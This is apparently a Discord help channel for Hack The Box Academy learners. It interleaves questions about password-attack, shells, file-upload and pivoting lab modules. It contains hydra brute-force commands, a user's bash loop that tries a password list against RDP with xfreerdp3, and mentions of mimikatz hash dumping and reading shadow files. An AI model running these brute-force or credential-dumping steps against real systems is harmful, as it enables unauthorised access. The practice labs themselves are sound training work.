I need a small hint with this question: “Examine the target and find out the password of the user Will. Then, submit the password as the answer.” I already found Kira’s password; I checked the .mozilla folder and found a logins.json file with the encrypted password, but when I try using the 3 tools provided in the module, none of them work. What should I do?
ill try be more specific next time
There are links in my profile to ask better questions
Transfer the tool to the target to get the answer
No fucking way hydra is still going
Then you're likely doing something wrong
Bro idk it's been going for basically 2 hours
Then you're doing something very wrong
It should not take 2 hours
are u on the password attack module? that also took me ages
There's also other tools like netexec
think its something wrong with htb
They're on the hard assessment
ohh mb
When I transfer them, they don’t work for me.
Use a precompiled version
The command was hydra -l Johanna -P mutatedpass.list rpc://ip -t 34 -f -vv
Password Attack hard lab
Tet with rdp, or with netexec
Test*
Recommended wordlist?
Usernames from /xato-net-10-million-usernames.txt didnt do the trick
Yes
Try cirt-default
Lol thank you found it right away, xato found the same word but in lowercase...
It's silly that I think it's case sensitive
Indeed
Rdp* and yes, it shouldn't take long
Did you try mimikatz?
Thank you very much
im learning shells & payloads > bind shells, and im doing everything exactly as it tells me to do, but for some reason it just chooses not to work
i cant navigate anything, i cant change directories or execute commands
Yes i tried mimikatz to try to sign in as david, and i used mimikatz to hashdump for david and i tried using davids ntlm hash.
Would anything change if I switch from my wifi connection to cellular data?
For speed? It's not giving me any error while on wifi
... yeah
You can DM
ok one sec let me get the images
Fr? Can that be the reason it always takes a lot of time?
Absolutely
Ok I switched from wifi to cellular it's not going faster
Oh cellular is typically worse
Hope it gives me something
Idk bro what else could it be?
Now it's going at the same speed as with wifi
I'm seeing the credentials being tried bc I did -vv
In the command
¯_(ツ)_/¯
Is there anyone I can pay to help
I legally cannot take money
Yes I asked if there's someone who can help me
I'd be careful offering money for services
Do you know anyone who is good with these things and could help me solve this problem?
You never know who may pick you up on it, and what they may do
Bro what's the alternative? I literally wasted 2 days waiting for hydra to give me
Something
And I'm still waiting for password attack module to be finished. There must be something wrong with my laptop or my connection or something bc everyone else is telling me hydra shouldn't ALWAYS take 2 hours + to finish
Yes and I have another hydra running with normal list
Uh? I'd just pay for knowledge I'm not giving anyone access to my laptop
Don't run multiple at once
G0b is more referring to people that would just scam you
Also it wouldn't have anything to do with your computer, just your connection
¯_(ツ)_/¯
Idk bro there must be something wrong, I can't keep waiting for someone to give me advice on discord
I assume you've tried switching from UDP to TCP?
What is your ping to the VPN server?
I am using tcp
My ping?
Yes
Open a command prompt, and run ping <hostname of the VPN server, or IP of the target>
It's how long it takes for a packet to travel from your computer, over the internet and back again to a target.
Ping target ip
64 bytes from ip icmp_seq=10 ttl=127 time=146ms
That's not too bad.. not great, but not terrible
Can you let it keep running? Do you get any dropped packets (packet loss)
I just keep seeing lines like this one
No weird stuff
Any missing numbers in the icmp_seq= field?
like icmp_seq=10 then after a bit icmp_seq=20 comes up
No it's 150 151 152
If you CTRL+C out, it should show you any packet loss stats
177 packets sent 0% packet loss
Ok, so it's not the network.. although 146 ping is not amazing, it's still ok
Ye
Honestly I'm not familiar with the module you are doing, just wanted to check it wasn't a network issue
It's not just this module, all modules take this long while using hydra
It's past 3 hours now
What's your general down/up speeds
Bruteforcing can sometimes take a long time, but I thought Academy modules were made in such a way to avoid such long delays like that
Also i suggest resetting the target and starting a fresh attempt
Mhhh idk how do I check it
I tried it with many other modules it's always the same thing
I also suggest trying with the pwnbox instead
But what's weird is that John takes very little time to crack something so it's prob not the laptop
Are you running it in Verbose mode, to see if there is anything really odd going on? -v or -V option
If you choose to test with the pwnbox you'll need to stop the vpn connection on your own machine
Yes I did -vv
I wanted to learn using these things with Kali : (
Download speed 21.23 upload 11.00
..and I assume no weird warnings or anything
Oof
That's just slow network speeds
Mutated password list from resources
It should be the top of the mutated list btw
You can likely guess it faster at this point
94000
It's at letter b
You're on the hard lab yeah?
Yes
Yeah it's before that
Tf I used -f in the command
Btw I'm trying speedlist.net again with wifi instead of cellular
Download 88.52 upload 20.18
It's at Basketball2005
I'm telling you the password is not that far down
Also try another remote service then
Did I do anything wrong? I was told to use -f flag
||winrm||
Hydra -l Johanna -P mutatedpass.list service://ip -f -t 34 -vv
This command is okay?
I don't recall if hydra supports winrm
Lemme try something else
Is this normal?
Why are you going through a list of names?
Bc I got the wrong command I'm using Johanna now
You can also pipe to grep to filter out the '[-]'
And just wait a minute for it to get the result
I don't understand what this means, what is the '[-]'?
Look at the results you had from the other command and use your brain
grep -v 'pattern' is an inverse grep
Just the list of wrong passwords?
Meaning it will show every line that doesnt contain the pattern
Netexec is preferred, since that's still being maintained
Doesn't netex or crackmapexec stop once it find the right creds?
I'll wait 30 minutes if it's still not finding it I'll close everything and look for an indian guy on fiver
Shits beyond ridiculous
What
Why u angry
Skill issue if you have to resort to paying someone else
Yes
I do lack in skills
This is why I'm here
i shouldn't have had to point you to the fact that multiple different remote services exist ¯_(ツ)_/¯
Bro I said multiple times I tried different machines with different service at different times with different vpns, it's all the same
Hydra or crackmapexec or whatever just runs and doesn't stop
Sometimes it finds it but it might take 2/3 hours
It shouldn't but you also have 20Mb internet so it may take a bit longer, but I can tell you that the pw is earlier
If netexec works do I need to use hydra for other stuff?
Like in general to brute force stuff
Is there any particular cases where you need hydra specifically?
Fuck me it worked
@fathom pendant thank you marcielee
Sometimes you're unnecessarily sarcastic but you know your shit thx
Idk I'm having hella problems with hydra, if you can use netexec for everything I don't think I'll ever use hydra again
At least it works😭
I don't believe in holding your hand. You'll need to work problems out using at least one of your two braincells
I'm doing the Linux Credential hunting section of password attacks module. I am logged in as Kira. I have found a zip file that I think has the password I am looking for for the other user but I don't have permission to open it. How do I bypass the permissions and open the file?
or unzip the file rather?
Hello, it may be a dumb question but I'm stuck on the module "Attacking Common Services" at the FTP part.
My nmap scan doesn't return any result even with -p- for all ports. Tried various ways to bypass it but it didn't work really well. I finally found the port but after that I can't do anything (no anonymous session, no brute force using the provided list...). Am I dumb ?
You're looking in the wrong place
Look at the methods described in the section
The zip file is for another section
ok thanks
I also saw the shadow file for will in Will's folder
I know there's a shadow file in will's folder but I'm having trouble figuring out how to read it
reason is I am trying the different things in the section and its not working
can someone give me a hint? I've tried a bunch of techniques from the section
I am trying to download lazagne onto the target host and use that as a last resort but the target is not on internet
Just cat it
At least that’s how you’d read etc shadow
ya but if I cat it it says permission denied
I tried that already
I don’t remember it top of my head, but usually just follow the section and replicate in exercise
Don’t divert too much
can someone help me with burp really quick?
i am trying to edit a response, but unable to edit the response... can't change anything, it doesnt let me type
intercepted the request, sent to repeater, trying to edit the response to resend but cant change at all
Repeater only repeats the request. Not the response
how can I change the html? I need to enable a button that is currently disabled, i see it disabled in the html
You can turn on response interception in settings
You'd need to hard refresh [ctrl+shift+r] the page for it to capture it
<body>
<form name='getflag' class='form' method='post' id='form1'>
<button class='btn block-cube block-cube-hover' id='submit' type='submit' formmethod='post' name='getflag' value='true' disabled>
there's a disable in the html, but not sure how can i change it using the request only
You're not
There's an option to intercept the response and edit it
Then have that send
i cant send screenshots here :/
Because your account isn't linked. Or something is wrong with the identifier and you'll have to have a mod help
Recently, I’ve moved into security at ownCloud. As part of the new role, I’ve had to invest lots of time learning about web application security attack vectors and about applications and tools for testing security.
It's also described in the web proxies module
Which I'm assuming they're working on
I know
Some people will come to the channel and ask stuff that could be related to some module but might not be going through the material
They just don't read at all, most of the time
I am reading guys
but it's kind of complicated when it's in a different language that is not yours lol
and i just started, if that bothers im sorry
hi I found the authorized keys file and the id_rsa file
am I supposed to crack those?
Do what you think
where can I find recommended boxes for modules I completed ?
nvm u just click on dashboard on the completed module
testing
So in regards to the web proxy module, in the ZAP Scanner section towards the end, the lesson seems super straightforward (albeit a bit out of date).
It was mentioned to me that the ZAP Hud isn't needed, and so after trying both with and without using ZAP HUD. It still seems like there's no high level vuln detected after doing an active scan.
Tried it a couple times, But no dice. Has anyone else run into this/had similar issues? Or am I missing something really obvious.
Seems like a really simple lab, so it's curious why the scan isn't revealing the high level vuln mentioned in the instructions
@supple meteor be careful with spoiling anything from the AEN module, also sometimes when you've added a user to a group, you'd need to log out and back in.
It will find the vuln, it takes a while
Why does it say no hashes loaded
you can also have it start from a potentially vulnerable endpoint
because the hash doesn't match what is expected for hashcat to crack it
"salt-value exception"
it tells you just above the "no hashes loaded" message
so something about your hashfile isn't formatted properly
sorry, but I supposed that's different host ?
If I'm not mistaken, the .hash file generated by john has some information that hashcat doesn't recognize, which is why it doesn't work. With john it should work. Otherwise you need to extract the part of the .hash file that hashcat can process
what i'm saying is if you didn't log out and back in, then the user may not have been synced/added to the group
but i don't recall needing to add any user to a group tbh
Hmmm..... let me try again here. Maybe I just didn't let it run long enough
it can take 30+ minutes if you do a full spider from the webroot
Oof, then I maybe I'm hitting the wrong target here afterall?
Though it should/does strike me as just being the target IP & port.
Let me refresh and try again
yes, but there is a vulnerable page if you just do a quick scan of what's available
and you can just start from that point and not crawl the full thing, which will have it take a LONG time
logged out and back, still get denied
Or I supposed to do dynamic port forwarding (:8081, via SSH) rather than chisel (:1080)
idk i used ligolo-ng for my proxy/agents ¯_(ツ)_/¯
lol it's time for another tool
i'll give it a try, thanks
ligolo is a 10/10 tool; though it works BEST if you run it with root :)
so maybe something is off, because even starting at the root here (i.e. <SERVER_IP>:<PORT>) for the target is still giving really quite speedy scans in about ~1 minute or so here. The Active Scan runs faster
Spider, AJAX Spider, and Active Scan's all running very quick,
And generated report doesn't seem to indicate any presence of high vulnerability issues.
Maybe I'm just doing something weird, Idk. But been looking at this for a while
there's a specific spider scan you gotta do
but it should not take <1 min to complete
Hm... I'll check it out again tomorrow here; gotta go get ready for work in the am 🙃
I appreciate the help nonetheless
please someone help, i am not able to send messages in the #general group
is there somebody that can help me
Read and follow #welcome
i logged in
but what to do next i am on the first step
what is account identifier
In password attack hard lab what am I supposed to do with the vhd file?
try googling the file type
Its a virtual disk but on the forum people are talking abt using John, I tried to use bitlocker2john and the John on the file outputted by bitlocker2john but it can't find a password @cloud urchin
I used mutated list
hi, if there is a better place to ask this, please let me know
I am almost at the very beginning of the hack the box academy stuff. I haven't done this in about a year, so I'm quite rusty on how everything works.
I am trying to ssh into the learning environment using openvpn.
I run sudo openvpn academy-regular.ovpn , and in a different tab ssh htb-student@<ip of learning environment>. but it gives the no route to host error, and I'm really not sure what the problem is because this is like super basic stuff and all of google seems to think its so easy. any ideas of what I could be doing wrong?
Did you start target?
ngl I don't know what that means
Windows Subsystem for Linux
I have done that like 8 times lol
if you get a bunch of tun0/1/2/3/4... then you need to sudo killall openvpn then run the openvpn command again
yeah because you didn't kill the old vpn when running the new one
so you're getting a bunch of routing collisions
basic networking, if you have multiple interfaces on a device all leading to the same point -- boom collisions
will the target machines self-destruct when i mark a module completed, or should i terminate them before moving on
yeah. its ironic because I'm doing this in big part to learn networking and yet I gotta slog through some stuff just to start learning 😂
sometimes
sounds like your list doesn't have the password then. i used hashcat i think, don't remember which wordlist i used.
but when you start a new target it terminates the old target anyway
so you're not just leaving a bunch of machines on
The nano command shows me exactly the same output as cat command for backup.hash
Idk why john isn't working
there's a dedicated key on your keyboard to take screen shots... also, read the output of your command. it tells you the syntax, it looks like you're not using bitlocker2john correctly to me.
What's wrong with it?
look at what the command returns.. it literally tells you "Usage: ...." and provides how to use it
Hi
I do not have that key unfortunately my laptop is Chinese
well i wasn't responding to you.. but there are also applications that do it like sharex.
or simply the built-in windows snip tool.
Yeah i use win shift s to take screenshots
a little confusion. the questions in some of the modules have nothing to do with what was covered in the module. what gives with that?
for instance i'm being asked "how many total packages are installed on the system" a method in which to do that was never described, and the answer from how i would get it is deemed incorrect
There was a bunch of commands listed, and it's also teaching that sometimes you need to look outside the module for additional clarity
eh the module was about file descriptors and STDIN/STDOUT. i was able to answer the question using dpkg-query
/feedback in the discord, or after you finish you can review the module
Hello guys, I need a small help.
So I am doing Skill Assessment - File Upload Attacks. In that I successfully upload the web shell file, but then when I search for the file in the submissions directory I don’t find it. Does the name of the file change, and how do I get to know it?
You'll have to dig around to figure out how things may work, you'll need to use multiple techniques to get to the answer
There's a section (other upload attacks) that goes over upload directory disclosure, maybe review that section.
Okay, thank you so much
What is the Type of the service of the "dconf.service"?
dconf.service does not exist in the target machine
Module: Documenting and Reporting
I can't extract the downloaded sample report from resources. Is anyone else facing the same issue?
It's pw protected
I don't think I saw a password in the module?
Nvm, thanks, found the password.
Does anyone have any hints for http attacks module and section: Exploitation of Request Smuggling?
guys i have a question, I wanna get started with cybersecurity, but this seems like such a wide and broad industry, I don't even know where to start. I've started by doing the Information Security Path from HTB Academy but I feel like doing modules from the HTB Labs is much better because you get to do on hands stuff, what do you guys think?
HTB Academy and HTB Labs are completely different
HTB Academy - theory, examples, exercises
HTB Labs - machines/challenges, no theory, no examples, e.g., figure it on your own
Hi
I wanna start my hacking journey with htb what do you think guys? Can I learn hacking with htb?
sure
Hey guys, I need some help. Im currently doing ffuf module, and I need to run a parameter fuzzing. But because the site I need to fuzz is private, I can't connect to it, I already added DNS entry but It still doesn't load on my virtual machine, so I went to pwnbox but there the whole internet is not working
What do you mean by added DNS entry? Added to /etc/hosts?
Why do you want to access the Internet if your target is on the private network? The PwnBox has access to the target machine in any case
Yes I added it the the /etc/hosts
I wanted to browse target website to make sure that ffuf can access it, but I can't browse anything, there is this error
This is not the Target Website 😉
This is the Academy Website
I know, I just wanted to check if it works, or I don't need access to internet to complete this?
You don't need access to the internet from the PwnBox
Also I can't install ffuf because of this
worked for me just now, try again ?
If ffuf is not installed on the PwnBox, you will need to contact support or use your own VM.
just curious, how come it works for me? I noticed I have the same IP in my pwnbox as I last had on my VPN, but I made sure it's off and I can still install
ah, subscription status maybe ?
if you have a subscription, your PwnBox should have an internet connection
what is the intended solution for the last flag on the skill assessemnt of pivoting?
I found it on a share on the last workstation, not the DC
But this share is from the DC, right?
yes
but no pivoting is required to access it
Yes, I remember. I was surprised too.
Strange. I do all my labs from my local machine with vpn to htb, so i dont know. but ffuf should be installed by default, so contact support.
I will contact support then I guess
Hi
Is someone able to help me on : Linux Privilege Escalation - Docker please ?
Thanks in advance 🙂
Hello ! anyone that pwned "Certified" machine ? I just need a lil hint
thanks
probably this could help someone in future..
i'm having an issue with network service section of password attacks module. hydra is not finding the rdp password, even after multiple attempts.
I have the right username from enumeration from previous access.
Upon multiple resets of target machine, it worked only once via the pwnbox, but has never worked from my own machine with the VPN.
As a workaround, I wrote a simple bash script which works for this section. It could help someone else stuck with same issue.
however, wouldn't recommend this for normal use.. works for this particular section since it has only around 200 passwords in the given resource file.
for line in $(cat password.list); do xfreerdp3 /v:<target-ip> /u:<user> /p:$line /log-level:OFF; echo "trying $line"; done
anyone?
easier if you just post your question
Well it would just spam having a discussion here
I have same issue as this guy can anyone help?
I'm starting the Active Directory penetration testing job role path next week. Curious to know if there's going to be a room available like CBBH, and CPTS.
You can DM what you have on your end.
yes sure what is the issue
mine got solved i was doing just a dumb mistake where i already had a nc session open in another rdp session and that was pulling all my connections
what are you having trouble with ? like what command are you running ?
reverse shell not working
and i only have 1 nc session
can you show your commands ?